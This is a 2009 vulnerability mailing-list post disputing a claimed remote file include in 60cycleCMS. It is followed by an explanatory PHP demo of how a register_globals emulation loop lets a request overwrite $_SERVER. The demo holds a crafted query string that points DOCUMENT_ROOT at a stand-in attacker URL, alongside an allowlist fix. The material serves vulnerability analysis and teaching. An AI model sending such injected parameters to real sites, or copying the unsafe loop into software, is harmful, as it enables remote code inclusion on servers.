[VIM] 60cycleCMS <= 2.5.0 Remote File Include Exploit
George A. Theall
theall at tenablesecurity.com
Tue Dec 22 21:05:33 UTC 2009
On Dec 22, 2009, at 3:41 PM, Steven M. Christey wrote:
> So I wish I had the direct reference at hand, but I'm pretty sure
> that older PHPs allowed overwriting of $_SERVER variables. How old,
> I'm not sure... I think Stefan Esser did some writeup on this. But
> now I've dug up a 2006 post to VIM where I said the same thing and
> apparently never followed up...
>
> There's always the risk of somebody implementing their own version
> of register_globals and poisoning $_SERVER that way, but the code
> snippet doesn't give enough context.
>
> Ah yes, Stefan saves the day on this last angle:
>
> http://www.suspekt.org/2009/02/06/some-facts-about-the-phplist-vulnerability-and-the-phpbbcom-hack/
To be clear, the problem Esser wrote about involves code that
explicitly copies request parameter values into PHP variables to
emulate PHP's register_globals when that's off:
    if (!ini_get("register_globals")
        || ini_get("register_globals") == "off") {
      # fix register globals, for now, should be phased out gradually
      # sure, this gets around the entire reason that register globals
      # should be off, but going through three years of code takes a
      # long time....
      foreach ($_REQUEST as $key => $val) {
        $$key = $val;
      }
    }
>> Code snippet from 2.5.0, which is supposedly affected:
>>
>> // include your sql info file here
>> $root = $_SERVER['DOCUMENT_ROOT'];
>> require "$root/../config.php";
>
> Yeah, I can see how this would raise questions. Code inspection
> would be needed.
Indeed. There's nothing of the sort going on in the code snippet from
60cycleCMS.
George
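An added example, written for this page and not taken from 60cycleCMS, phplist or the thread above, to make concrete what the emulation loop George quotes actually does to $_SERVER, and why its absence from 60cycleCMS matters. The request array, the attacker URL http://attacker.example/x, the fallback document root /var/www/html and the allowlist of parameter names are all constructed for the demonstration. Everything runs at file scope on purpose: PHP does not let variable variables reach a superglobal from inside a function, so the overwrite only happens in code like phplist's, which ran the loop at the top of the script.

```php
<?php
// Added example (not code from 60cycleCMS, phplist or the VIM thread).
// Shows how "foreach ($_REQUEST as $key => $val) $$key = $val;" at file
// scope lets a request parameter replace the $_SERVER superglobal, so a
// later  require "$root/../config.php"  with $root taken from
// $_SERVER['DOCUMENT_ROOT'] goes wherever the attacker points it.
//
// Constructed request. Over HTTP, PHP builds exactly this $_REQUEST from
// the query string  ?page=home&_SERVER[DOCUMENT_ROOT]=http://attacker.example/x
// because bracket syntax in a parameter name is parsed into a nested array.
$_REQUEST = [
    'page'    => 'home',
    '_SERVER' => ['DOCUMENT_ROOT' => 'http://attacker.example/x'],
];

// The CLI SAPI sets no DOCUMENT_ROOT; assume a web root so the "safe" run
// below has a genuine value to show.
$_SERVER['DOCUMENT_ROOT'] = $_SERVER['DOCUMENT_ROOT'] ?? '/var/www/html';
$savedServer = $_SERVER;

// --- Unsafe: the phplist-style emulation loop, same behaviour as quoted ---
foreach ($_REQUEST as $key => $val) {
    // With $key === '_SERVER' this assignment, made at file scope, replaces
    // the superglobal wholesale with the attacker's array.
    $$key = $val;
}
$root = $_SERVER['DOCUMENT_ROOT'];
echo "unsafe: require \"$root/../config.php\"\n";
// With allow_url_include=On that require fetches remote code; with it Off
// the attacker can still name any local path (log file, uploaded file ...).

$_SERVER = $savedServer;   // undo the poisoning before the second run

// --- Safer: only copy parameter names the application actually expects ---
$allowed = ['page', 'id'];   // assumed list of real parameters
foreach ($_REQUEST as $key => $val) {
    // Anything not on the allowlist is dropped. That covers _SERVER, _GET,
    // _COOKIE, _SESSION, GLOBALS and every other name the code never meant
    // to read from the request.
    if (!in_array($key, $allowed, true)) {
        continue;
    }
    $$key = $val;
}
$root = $_SERVER['DOCUMENT_ROOT'];
echo "safe:   require \"$root/../config.php\"\n";
echo "page  = $page\n";
```

Run it with the PHP CLI. In the first half, $_SERVER['DOCUMENT_ROOT'] after the loop is the value supplied in the request, so the include path starts with the attacker's URL; in the second half it is the saved web root and only $page reaches the global namespace. The point for the 60cycleCMS snippet is the one George makes: $_SERVER['DOCUMENT_ROOT'] comes from the web server, and without a loop of this kind in the application there is no way for a request to rewrite it. The allowlist loop is shown only as the least-bad version of the pattern; removing the emulation altogether and reading $_GET/$_POST explicitly is the real fix.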